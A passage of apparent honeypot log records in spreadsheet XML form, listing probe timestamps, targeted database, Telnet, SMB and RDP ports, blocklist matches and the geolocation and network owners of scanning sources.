    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Rjil Internet"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:312f:c306"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2601"/>
    <x v="2601"/>
    <s v="r167-57-76-104.dialup.adsl.anteldata.net.uy"/>
    <x v="0"/>
    <d v="2025-04-08T12:42:29"/>
    <d v="2025-04-08T12:42:29"/>
    <d v="2025-04-08T12:42:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="UY"/>
    <s v="Uruguay"/>
    <s v="MO"/>
    <s v="Montevideo Department"/>
    <s v="Municipio B"/>
    <s v="Montevideo"/>
    <s v="3441575"/>
    <s v="NA"/>
    <s v="-34.9033"/>
    <s v="-56.1882"/>
    <s v="6057"/>
    <s v="AS6057"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="corporate"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:a739:4c68"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2602"/>
    <x v="2602"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T12:41:26"/>
    <d v="2025-03-04T07:51:03"/>
    <d v="2025-04-08T12:41:26"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:eff:4887"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2603"/>
    <x v="2603"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T12:26:13"/>
    <d v="2025-04-08T12:24:00"/>
    <d v="2025-04-08T12:26:13"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:45b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2604"/>
    <x v="2604"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T12:23:02"/>
    <d v="2024-12-07T10:44:29"/>
    <d v="2025-04-08T12:23:02"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6139"/>
    <s v="77.209"/>
    <s v="18002"/>
    <s v="World Phone Internet Services Pvt. Ltd."/>
    <s v="WORLDPHONE"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-09-13"/>
    <s v="WPISPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:e66:6e75"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2605"/>
    <x v="2605"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T12:03:43"/>
    <d v="2025-04-08T12:03:43"/>
    <d v="2025-04-08T12:03:43"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Dorāha"/>
    <s v="1272375"/>
    <s v="NA"/>
    <s v="30.7995"/>
    <s v="76.0236"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:1326"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2606"/>
    <x v="2606"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T11:59:02"/>
    <d v="2025-04-08T11:51:27"/>
    <d v="2025-04-08T11:59:02"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="212238"/>
    <s v="Datacamp Limited"/>
    <s v="Datacamp Limited"/>
    <s v="hosting"/>
    <s v="Cdnext FRA"/>
    <s v="1994-11-30"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a996:c906"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2607"/>
    <x v="2607"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T11:57:27"/>
    <d v="2024-12-19T15:36:57"/>
    <d v="2025-04-08T11:57:27"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H23"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Jalandhar"/>
    <s v="Jalandhar"/>
    <s v="1268782"/>
    <s v="144001"/>
    <s v="31.326"/>
    <s v="75.5762"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Hfcl Infotel LTD"/>
    <s v="residential"/>
    <s v="St Soldier Educational Society"/>
    <s v="2009-02-11"/>
    <s v="St_Soldier_Educational_Society"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:70c4:11a"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2608"/>
    <x v="2608"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T11:55:52"/>
    <d v="2025-04-08T11:48:42"/>
    <d v="2025-04-08T11:55:52"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c4:8525"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2609"/>
    <x v="2609"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T11:54:32"/>
    <d v="2025-02-17T12:01:27"/>
    <d v="2025-04-08T11:54:32"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H16"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Coimbatore"/>
    <s v="Coimbatore (Balaji Nagar)"/>
    <s v="1273865"/>
    <s v="641018"/>
    <s v="11.0223"/>
    <s v="76.9797"/>
    <s v="45284"/>
    <s v="Wireline Solution India Pvt Ltd."/>
    <s v="WLSNET"/>
    <s v="cellular"/>
    <s v="Wireless Solution India Pvt Ltd."/>
    <s v="2015-09-15"/>
    <s v="WLSNET-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.196.30.194,64305)}&amp;&amp;{Data_SMB:Incoming connection (103.196.30.194,64925)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67c4:1ec2"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2610"/>
    <x v="2610"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T11:44:34"/>
    <d v="2024-03-28T12:52:49"/>
    <d v="2025-04-08T11:44:34"/>
    <n v="115"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1803&amp;&amp;22&amp;&amp;16426&amp;&amp;3306&amp;&amp;1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="106"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.8231"/>
    <s v="106.63"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="VIETELftth"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:734f:3e15"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2611"/>
    <x v="2611"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T11:33:52"/>
    <d v="2025-04-08T11:33:52"/>
    <d v="2025-04-08T11:33:52"/>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1:672a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2612"/>
    <x v="2612"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T11:29:46"/>
    <d v="2025-04-08T10:47:59"/>
    <d v="2025-04-08T11:29:46"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata"/>
    <s v="1275004"/>
    <s v="NA"/>
    <s v="22.5626"/>
    <s v="88.363"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="2016-03-15"/>
    <s v="GTPLKCBPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67d3:8729"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2613"/>
    <x v="2613"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T10:57:04"/>
    <d v="2025-02-20T13:33:38"/>
    <d v="2025-04-08T10:57:04"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}"/>
    <n v="72"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="business"/>
    <s v="RailTel Corporation"/>
    <s v="2015-11-04"/>
    <s v="RAILTEL-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:671e:410f"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2614"/>
    <x v="2614"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T10:46:44"/>
    <d v="2025-01-22T10:15:32"/>
    <d v="2025-04-08T10:46:44"/>
    <n v="59"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="1433&amp;&amp;3306&amp;&amp;445&amp;&amp;59750&amp;&amp;59586"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JT"/>
    <s v="Central Java"/>
    <s v="Kudus Regency"/>
    <s v="Kudus"/>
    <s v="1639215"/>
    <s v="NA"/>
    <s v="-6.8048"/>
    <s v="110.84"/>
    <s v="140475"/>
    <s v="PT Citra Celebas Multimedia"/>
    <s v="PRIMAHOME"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2020-07-30"/>
    <s v="PRIMAHOME-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.153.246.228,57423)}&amp;&amp;{Data_SMB:Incoming connection (103.153.246.228,58155)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6799:f6e4"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2615"/>
    <x v="2615"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T10:30:02"/>
    <d v="2025-04-08T10:20:58"/>
    <d v="2025-04-08T10:30:02"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:89fd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2616"/>
    <x v="2616"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T10:28:20"/>
    <d v="2023-12-03T14:47:00"/>
    <d v="2025-04-08T10:28:20"/>
    <n v="136"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H12"/>
    <s v="1433&amp;&amp;32438&amp;&amp;445&amp;&amp;3389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="BR"/>
    <s v="Bihar"/>
    <s v="Patna"/>
    <s v="Patna (Police Colony)"/>
    <s v="1260086"/>
    <s v="800001"/>
    <s v="25.5819"/>
    <s v="85.0818"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="business"/>
    <s v="Bharti Airtel Limited"/>
    <s v="2010-09-14"/>
    <s v="BHARTI-MO-IN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;stshash"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (223.178.215.161,62429)}&amp;&amp;{Data_SMB:Incoming connection (223.178.215.161,63773)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfb2:d7a1"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2617"/>
    <x v="2617"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-08T10:23:06"/>
    <d v="2024-02-14T06:57:59"/>
    <d v="2025-04-08T10:23:06"/>
    <n v="544"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
